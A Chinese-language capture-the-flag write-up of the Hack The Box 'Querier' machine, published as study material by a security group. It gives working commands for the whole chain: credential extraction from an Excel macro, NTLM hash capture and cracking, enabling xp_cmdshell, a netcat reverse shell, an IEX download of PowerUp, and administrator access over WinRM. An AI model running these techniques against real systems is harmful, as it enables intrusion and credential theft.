文章来源|MS08067 内网安全知识星球
本文作者:阿青(Ms08067内网安全小组成员)
目标IP: 10.10.10.125
本机IP: 10.10.14.6
需要的工具
smbclient
responder
nc
powerup.ps1
nmap
# nmap -sC -sV -p- 10.10.10.125 -oA querier
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-16 00:56 EST
Nmap scan report for querier.htb (10.10.10.125)
Host is up (0.013s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 14.00.1000.00
| ms-sql-ntlm-info:
smbclient -U QUERIER/invalid //10.10.10.125/Reports
smb: \> get "Currency Volume Report.xlsm"
# strings vbaProject.bin
macro to pull data for client volume reports
n.Conn]
Open
rver=<
SELECT * FROM volume;
word>
MsgBox "connection successful"
Set rs = conn.Execute("SELECT * @@version;")
Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
得到sql-server连接信息:
使用mssqlclient连接数据库
mssqlclient.py -windows-auth querier/reporting:PcwTWTHRwryjc\$c6@$TARGET_IP
连接数据库后,发现没有权限执行命令。这里利用xp_dirtree去发送一个目录请求,并利用responder开启一个smb server认证服务来抓取hash信息。
# 开启responder
responder -I eth0 -wrf
破解hash
利用hashcat破解抓到的hash
hashcat -m 5600 ./test.nltmv2 ~/hacktools/worddic/rockyou.txt --force
MSSQL-SVC::QUERIER:7808a070c190110d:0ecfa929ab261b727253df84af7cf1f2:0101000000000000c0653150de09d20128624bd821667131000000000200080053004d004200330001001e00570049004e002d00500052004800340039003200520051004100460056000400140053004d00420033002e006c006f00630061006c0003003400570049004e002d00500052004800340039003200520051004100460056002e0053004d00420033002e006c006f00630061006c000500140053004d00420033002e006c006f00630061006c0007000800c0653150de09d201060004000200000008003000300000
000000000000000000003000009828af224f44d2d8ddb8f0e488a92d1bfff623c7fb3b5448ed22e96f6842e89b0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003600000000000000000000000000:corporate568
用户名: mssql-svc
口令:corporate568
SQL> EXEC sp_configure 'show advanced options', 1;
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> EXEC sp_configure 'xp_cmdshell', 1;
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> xp_cmdshell "dir c:\users"
output
...
上传nc并反连
SQL> xp_cmdshell "powershell -command Invoke-WebRequest -Uri http://10.10.14.23/nc.exe -OutFile c:\programdata\nc.exe"
SQL> xp_cmdshell "c:\programdata\nc.exe 10.10.14.6 1234 -e c:\windows\system32\cmd.exe"
# nc监听
nc -lvnp 1234
执行命令成功
利用PowerUp.ps1脚本收集主机信息
Powerup是本地特权提升的一些调用方法,功能相当强大,拥有众多实用的脚本来帮助我们寻找目标主机Windows服务漏洞进行提权,也是PowerShell Empire和PowerSploit 的一部分。参考https://blog.csdn.net/l1028386804/article/details/86089574/
PS C:\Windows\system32> IEX (New-Object Net.Webclient).downloadstring("http://10.10.14.6/PowerUp.ps1")
PS C:\Windows\system32> invoke-allchecks
[*] Checking for cached Group Policy Preferences .xml files....
Changed : {2021-03-14 14:12:48}
UserNames : {Administrator}
NewName : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File : C:\ProgramData\Microsoft\GroupPolicy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
C:\Windows\system32>powershell
利用winrm接口执行命令
nmap扫描时,目标开放了5985端口
require 'winrm'
# Author: Alamot
conn = WinRM::Connection.new(
endpoint: 'http://10.10.10.125:5985/wsman',
user: 'querier\administrator',
password: 'MyUnclesAreMarioAndLuigi!!1!',
)
command=""
conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end
# ruby querier.rb
...
利用wmiexec连接
wmiexec.py Administrator:MyUnclesAreMarioAndLuigi\!\!1\!@10.10.10.125
在对整个靶场的攻击中,前期的信息收集很重要,比如通过nmap扫描的445端口发现敏感文件,而后运用sql-server去实现命令执行,最后通过5985端口执行命令,同时,发现sql_server无法执行命令时,也可以尝试运用xp_dirtree+responder的方式进行突破。
扫描下方二维码加入星球学习
加入后邀请你进入内部微信群,内部微信群永久有效!
和4000+位同学一起加入星球学习